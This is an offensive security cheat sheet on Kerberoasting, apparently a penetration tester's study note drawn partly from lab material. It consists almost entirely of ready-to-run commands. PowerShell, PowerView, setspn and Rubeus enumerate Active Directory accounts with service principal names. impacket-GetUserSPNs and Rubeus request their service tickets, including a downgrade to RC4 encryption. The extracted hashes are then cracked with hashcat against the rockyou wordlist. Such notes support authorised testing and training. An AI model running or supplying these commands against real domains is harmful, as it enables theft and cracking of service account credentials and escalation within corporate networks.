❤️‍🔥

Kerberoasting

Tags
KerberosAuthenticated

Identify

Windows

AD Module in powershell

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Local

Using Powerview

Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName
Local
setspn.exe -Q */*
Local

Using Rubeus

.\Rubeus.exe kerberoast /stats

Linux

impacket-GetUserSPNs -dc-ip <dcip> domain.local/username
remote

Exploit

From Linux

impacket-GetUserSPNs -dc-ip <dcip> domain.local/username -request
remote (request all tickets)
impacket-GetUserSPNs -dc-ip <dcip> domain.local/username -request-user
get single users tgs

you can also use -outputfile <name>

Crack hash

hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt

From Windows

Semi-manual approach

PowerView

Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname
list users with spn set
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat
request specific users tgs and specify output format
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation
export tickets for processing

Rubeus

.\Rubeus.exe kerberoast /stats
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
.\Rubeus.exe kerberoast /tgtdeleg /nowrap
tgtdeleg requests rc4 type rickets (way easier to crack)

On Windows Server 2019 and above you cannot force a downgrade to rc4 ticket type. It will always respond with AES at minimum.